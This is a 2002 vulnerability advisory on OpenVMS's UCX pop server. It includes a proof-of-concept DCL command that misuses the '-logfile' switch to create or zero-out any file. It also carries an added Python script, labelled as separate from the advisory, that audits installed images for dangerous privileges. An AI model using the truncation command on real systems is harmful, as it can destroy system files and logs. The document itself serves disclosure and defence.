Akita Security Advisory 27/09/2002

OpenVMS UCX$POP_SERVER.EXE vulnerability

Advisory: http://www.akita-security.co.uk/VMS/ucx_pop_server.txt
VMS security tool: http://www.akita-security.co.uk/stoat

Overview
========

UCX is the main TCP/IP stack for OpenVMS. Akita Security have discovered a
vulnerability in every version of the UCX pop server which allows a local user
to overwrite any file on the system with a 0-byte file. Due to the popularity
of UCX this problem will be widespread amongst OpenVMS installations.

This issue was discovered as part of wider research into OpenVMS security.
Many issues have been found, and further advisories will be released shortly.

Detail
======

The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is installed with
the VMS privileges BYPASS and SYSPRV:

INSTALL> list ucx$pop_server.exe /full

   DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE
      UCX$POP_SERVER;1      Prv
         Entry access count         = 1
         Privileges = SYSPRV BYPASS

INSTALL>

The BYPASS privilege allows the pop server to override filesystem permissions.
By use of the -logfile command-line switch, it is possible to persuade the
server to open a file anywhere, or to truncate an existing file, as follows:

____________________________________________________________________
$ show process/privs

25-SEP-2002 10:47:35.02   User: MIKE             Process ID:   0000013F
                          Node: VAX              Process name: "_TNA21:_1"

Authorized privileges:
 NETMBX    TMPMBX

Process privileges:
 NETMBX               may create network device
 TMPMBX               may create temporary mailbox

Process rights:
 INTERACTIVE
 REMOTE

System rights:
 SYS$NODE_VAX

$
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
19102-09-24 17:41:39 sizeof(block_wait_times) 160
19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32
19102-09-24 17:41:40 num_elems 5
[SNIP]
^C
$ dir/prot sys$system:I_*

Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1
                      insufficient privilege or object protection violation

Total of 1 file.
$
____________________________________________________________________

The file created looks like this:

____________________________________________________________________
Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1      File ID:  (9499,485,0)
Size:            0/0          Owner:    [SYSTEM]
Created:   24-SEP-2002 17:41:41.14
Revised:   24-SEP-2002 17:41:57.09 (1)
Expires:   <None specified>
Backup:    <No backup recorded>
Effective: <None specified>
Recording: <None specified>
File organization:  Sequential
Shelved state:      Online
File attributes:    Allocation: 0, Extend: 0, Global buffer count: 0
                    No version limit
Record format:      Stream_LF, maximum 0 bytes, longest 32767 bytes
Record attributes:  Carriage return carriage control
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

Total of 1 file, 0/0 blocks.
$
____________________________________________________________________

Severity
========

At the least, this bug could be used by a local user to destroy an OpenVMS
installation, or overwrite logfiles. If a local user could control the log
output of the pop server it could probably be used to gain full privileges,
although this is speculation on our part.

Workaround
==========

Remove world execute permissions for the pop server binary.

Vendor status
=============

Akita Security informed Compaq of this vulnerability on 14/06/2002. Compaq
have released an ECO which corrects the problem:

____________________________________________________________________
ECO B   1-JUL-2002   Alpha and VAX

Problem:      Disable the "-logfile" command line switch, which is not
              needed on OpenVMS.

Deliverables: TCPIP$POP_SERVER.EXE V5.3-18B

Reference:    Internal testing.
____________________________________________________________________

Please note the lack of reference to a security problem, and the lack of
credit to Akita Security. Internal testing ?
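As an added defender's check (not part of the advisory, of UCX, or of the ECO), the following Python parses INSTALL> LIST /FULL output in the layout shown under Detail and reports every installed image carrying BYPASS, SYSPRV or a similar privilege, so the same class of problem (a privileged image that honours a user-supplied file path) can be looked for across all installed images. The sample listing, the EXAMPLE_* images and the privileges beyond BYPASS/SYSPRV on the watch list are constructed assumptions.

```python
import re

# Privileges that let an installed image override file protection or escalate.
# BYPASS and SYSPRV are the two the advisory shows on UCX$POP_SERVER.EXE; the
# rest are an assumed auditor's watch list, not something the advisory states.
DANGEROUS_PRIVS = {"BYPASS", "SYSPRV", "CMKRNL", "CMEXEC", "READALL"}

# Image entry line: 'NAME;version' followed by INSTALL flags such as Prv, Shar.
IMAGE_RE = re.compile(r"^([A-Z0-9$_]+);\d+\s*(.*)$")

def parse_install_list(text):
    """Parse INSTALL> LIST /FULL output, laid out as in the advisory's listing
    (directory line, indented 'NAME;version flags' line, then 'Key = value'
    lines), into {image name: set of privileges it is installed with}."""
    privs, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("INSTALL>"):
            continue
        if "=" in line:                      # 'Key = value' attribute line
            key, _, value = line.partition("=")
            if current and key.strip().upper() == "PRIVILEGES":
                privs[current].update(value.split())
            continue
        m = IMAGE_RE.match(line)
        if m:                                # start of a new image entry
            current = m.group(1)
            privs[current] = set()
        # Any other line is a directory header; it carries no privilege data.
    return privs

def find_privileged_images(text, dangerous=DANGEROUS_PRIVS):
    """Return [(image, sorted dangerous privileges)] for each installed image
    whose privilege list intersects `dangerous`, in listing order."""
    return [(name, sorted(p & dangerous))
            for name, p in parse_install_list(text).items() if p & dangerous]

# Constructed sample modelled on the advisory's listing; the second and third
# images and their privileges are invented for illustration.
SAMPLE = """\
INSTALL> list /full
   DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE
      UCX$POP_SERVER;1      Prv
         Entry access count         = 1
         Privileges = SYSPRV BYPASS
      EXAMPLE_DAEMON;3      Open Hdr Shar Prv
         Entry access count         = 4
         Privileges = CMKRNL
      EXAMPLE_TOOL;1      Open Hdr Shar
INSTALL>
"""
```

Feed it the captured output of INSTALL> LIST /FULL on a real system; each image it reports is a candidate for the same review (which command-line switches and file paths does it accept from an unprivileged user?) and for the Workaround above.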
Credit
======

This issue was discovered by mike@akita.co.uk

--
Mike Riley - Security Systems manager @ Akita
http://www.akita-security.co.uk
--------------------------------------------------------------------
Sales: T: +44(0)1869 320111  F: +44(0)1869 250688  E: sales@akita.co.uk
Tech:  T: +44(0)1869 320111  E: mike@akita.co.uk
--------------------------------------------------------------------
"Security, performance, cost - pick two"